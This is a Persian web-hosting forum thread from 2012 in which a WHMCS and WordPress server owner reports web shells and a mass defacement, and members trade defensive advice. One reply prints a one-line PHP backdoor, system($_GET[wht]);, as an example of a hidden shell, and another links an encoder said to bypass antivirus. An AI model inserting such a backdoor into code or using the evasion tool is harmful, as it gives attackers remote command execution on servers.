سلام دوستان
من WHMCS نسخه اصلی رو دارم استفاده می کنم و لایسنس هستش
تمامی نکات امنیتی رو رعایت کردم
امروز گروه King of control توی پوشه ی templates سیستم whmcs شل آپ کردن که از طریق اون روی تمامی سایت های روی سرور من یک فایل index.htm قرار دادن و پیغام هک شدن رو قرار دادن!
توی این پیغام که از طرف این گروه عربستانی بود به ایرانی ها بی احترامی شد و در پایان گفته بودن : در اومور ما دخالت نکنید!!!
اومورتون بخوره تو سرتون :))
من خیلی زود شل هارو پاک کردم و Index.htm هارو حذف کردم. اما می خوام بدونم راهی هست که نزارم توی templates فایل آپ شه؟
که دیگه از این طریق هک نشم
شل رو توی چند قسمت wordpress هم آپ کرده بودن. من روی صفحه اصلی سایتم وردپرس نصب کردم که اون هارو هم پاک کردم
ورد پرس تاحالا چند بار باعث هک شدن من شده! دیگه این سیستم داره نا اومیدم میکنه! بیشتر پلاگین هاش باگ داره! :-&
parsianweb
March 20th, 2012, 03:02
عجب! بنظرم از وردپرس نیست. مشکل جایه دیگست
vps-baran.ir
March 20th, 2012, 03:15
تنها راهی که وجود داره و میشه هک شد از طریق تیکت هست
من کلا سیستم تیکت رو جم کردم و هیچ مشکلی ندارم
و از طریق ایمیل ، تلفن و یاهو پشتیبانی دارم
ولی بعضی ها هستن که سیستم تیکت رو نیاز دارن
تنها راهش اینکه که پچ امنیتی رو نصب کنید و موارد گفته شده تو تاپیک هایی که تو سایت وجود داره
رعایت کنید
alfavps
March 20th, 2012, 03:18
سلام
دوست عزیز بعید میدونم از وردپرس باشه
اگر طبق حرف خودتون همه ی موارد امنیتی رو رعایت کرده باشید پس مشکلی از طرف وردپرس نبوده مشکل اینجاست که هکر 169 سایت رو با آی پی :78.47.59.144 به صورت Mass Deface برده رو هوا یعنی دسترسی روت بوده و کاری از شما ساخته نیست.
درضمن صفحه ایندکس هنوز دیفیس هستش لطفا از طریق phpMyadmin اصلاحش کن اینجوری خیلی ناجوره و هر چه زودتر سرور رو عوض کن و یه جای دیگه سایتت رو هاست کن.
موفق باشی
php.source
March 20th, 2012, 03:23
ورد پرس هم باگ داره. whmcs هم داره :دیاین عربام مشالا فعالیتشون زیاد شده
parsvia
March 20th, 2012, 03:32
من ورد پرس رو پاک کردم از سیستم.
توی چند پوشه از ورد پرس بخصوص پوشه انتی شل - شل آپلود شده بود
دیگه واقعا عصبیم کرده بود و پاک کردم ورد پرس رو
whmcs از طریق تیکت هک نشده! من تیکت رو فقط واسه اعضام باز گزاشتم فایل شل رو نمی دونم چطوری توی پوشه templates اپ کردن!!!
این حملات رو مدام داره تکرار می کنه!
حتی از فروم سایت که mybb هستش! اونجا هم شل اپ کردن!!
فروم رو هم فعلا بستم!
fara_server
March 20th, 2012, 03:34
پلاگینهای وردپرس که الا ماشاا... باگ میده ... به نظر من برید سراغ دیتالایف و همونطور که دوستمون اشاره داشتند از هاستینگ امن استفاده کنید ...
الان دیگه اینجوری شده دیگه ، یک backdoor رو سرور میزنن و کل سرور رو مس دیفیس میکنند! هاستینگ share همینه......................................
پ.ن : از عرب هکر در نمیاد! از هک فقط دیفیس و میفهمند و خریدن اکسپلویت :))
alfavps
March 20th, 2012, 03:37
عرض کردم بهتون
همین mybb که میگید شل آپ کردن توش کار هر کسی نیست به سختی باگ میده بخصوص ورژن 1.6.4 به بالا مجبورا هکرها برای هکش میرن سراغ متد sql injection
پیشتر گفتم هک سایت شما به صورت mass deface انجام شده وهکر به سرور روت بوده و میتونه هر فایلی رو در هر دایرکتوری آپ کنه.
سایتتون رو جای دیگه هاست کنید.
parsvia
March 20th, 2012, 03:52
واقعا خوابم میاد!!!!!!! لعنتیا چه شبیم واسه هک کردن انتخاب کردن! 1 شب قبل از سال نو
خدا سرویسشون کنه:63:
---------- Post added at 03:52 AM ---------- Previous post was at 03:39 AM ----------
مرسی از تمام دوستان. پیشاپیش سال نوتون هم مبارک
sarwhost
March 20th, 2012, 03:56
پس بچه ها نتیجه این میشه که whmcs مشکل نبوده یعنی مشکل از سروه--- اون تیکتها فک نکنم کاری بکنن چون وقتی من تیکت زدن برای عموم محدود نکرده بودم زیاد داشتم اما همین تاپیک که خوندم رفتم templates یه شل دیدم فک کنم مال خیلی وقت پیش بود فراخوانیم کردم نشد --- راستی بچه ها با چی کدوم انتی ویروس سی پنل اسکن کنیم -- انتی ویروسی هس شل هم پیدا کنه؟؟؟
fara_server
March 20th, 2012, 04:00
پس بچه ها نتیجه این میشه که whmcs مشکل نبوده یعنی مشکل از سروه--- اون تیکتها فک نکنم کاری بکنن چون وقتی من تیکت زدن برای عموم محدود نکرده بودم زیاد داشتم اما همین تاپیک که خوندم رفتم templates یه شل دیدم فک کنم مال خیلی وقت پیش بود فراخوانیم کردم نشد --- راستی بچه ها با چی کدوم انتی ویروس سی پنل اسکن کنیم -- انتی ویروسی هس شل هم پیدا کنه؟؟؟
آنتی ویروس کارش پیدا کردن شلره دیگه ، Clamav از بهترینهاست...
اما روشهای جدید Encode کردن حتی آنتی ویروسهارو هم بایپس میکنه .
نمونش : Carbylamine PHP Encoder - THN - Pastebin.com (http://pastebin.com/ac8r3q81)
vahidmom
March 20th, 2012, 10:02
من بهتون این مورد رو پیشنهاد میکنم
http://www.webhostingtalk.ir/f10/43129/
اخرین بار سرور یکی از مشتری ها رو باهاش اسکن کریدم ماشالا توش 600 تا فایل شل بود که 500 تاش رو یه سایت بود
تا موقعی که فایل شل رو سرور باشه نمیزارن راحت باشین
abolfazlgoodarzi
March 20th, 2012, 10:08
سلام.
سال نو مبارک
کل هاستتون رو زیپ و دانلود کنید. با آنتی ویروس سیستمتون (که قبلش به روزسانی شده)اسکن کنید.
و فایل هاتون رو دوباره آپلود کنید.
دسترسی فایل ها رو چک کنید. دسترسی پوشه ها رو چک کنید.
پورت ها رو ببنید. فایروال رو روی آخرین مود بذارید.
با آنتی ویروس سرور هم یه چک کنید.
اجازه آپلود فرمت های غیر مجاز مثل پرل رو بگیرید.
فانکشن ها و توابع خطرناک رو ببند
Fracture
March 21st, 2012, 22:29
یه فایل PHP با این مجتوا در فولدر Hook قرار بدید که کلا از دست PHP راحت بشید:
<?php
$checkvars = array('subject','message');
foreach ($checkvars as $checkvar) if (strpos($_REQUEST[$checkvar],'{php}')!==false) die("ERROR!");
?>
saharhost.ir
March 30th, 2012, 16:29
دوستان من روی سرور هیچ شلی وجود نداره این گروه هم عربستانی نیست ایرانیه ولی با وجود بستن تیکت بازم منو هک میکنه برامون شده بازی اون هک میکنه یوزر ادمین رو عوض میکنه منم میرم از داخل هایت و پی اچ پی مای ادمین یوزر رو چینج میکنم و دوباره وارد میشم راستی وردپرس چیزی حدود 48 باگ امنیتی داره که هر کسی اینو نمیدونه بهترین چیز توی این نت قالب های اچ تی ام ال هست که اونم باید حوایتون باشه
RoobinaServer
March 30th, 2012, 16:53
دوست عزیز هکری که اول هک میکنه و میگید هی گیر دادن و دارن هکتون میکنن به نظر من کار عرب ها نیست چون عرب ها هی وقت نمیگذارن یک سایت رو هی هک بکنن یک بار میکنن و تو سایت های معروف میگن ما این سایت رو یک بار هک کردیم و ...
این کار یکی از رغیب هاتون یا دشمن های شما هست و مطمئن باشید راهی گذاشته برای برگشتش توی سرور وقتی هر بار جلوی هکش رو میگیرید
احتمال زیاد تونسته بکدور از سرورتون بگیره و داخل سرور یوزر و پس ساخته باشه
تمامی یوزر و پسورد های مدیریتی سرورتون و سیپنل رو عوض کنید و چک کنید به جز یوزر root یوزر دیگه ای وجود نداشته باشه که به ssh دسترسی پیدا بکنه(روت کیت)
fara_server
March 30th, 2012, 17:07
دوستان من روی سرور هیچ شلی وجود نداره این گروه هم عربستانی نیست ایرانیه ولی با وجود بستن تیکت بازم منو هک میکنه برامون شده بازی اون هک میکنه یوزر ادمین رو عوض میکنه منم میرم از داخل هایت و پی اچ پی مای ادمین یوزر رو چینج میکنم و دوباره وارد میشم راستی وردپرس چیزی حدود 48 باگ امنیتی داره که هر کسی اینو نمیدونه بهترین چیز توی این نت قالب های اچ تی ام ال هست که اونم باید حوایتون باشه
لاگها رو به دقت چک کنید ، هکرها همیشه از شلرها که کدهاشون قابل درک برای هر آنتی ویروسی هست استفاده نمیکنند.
بعضی وقتها با اضافه کردن یک خط کد ساده درون کدهای php شما یک به اصطلاح شل مخفی ایجاد میکنند !!!
شاید چیزی شبیه به این که به راحتی میتونه یک RCE محسوب بشه!
به عنوان مثال این:
system($_GET[wht]);
====-----====
پ.ن : در کل به نظر بنده پس ودرد هر چیزی که به ذهنتون میرسه رو عوض کنید و به دقت فایلهای مربوط به log ور چک کنید تا ببینید مشکل از کجاست ، بهتره ریشه ای برسی کنید تا اینکه صورت مسئله رو پاک کنید!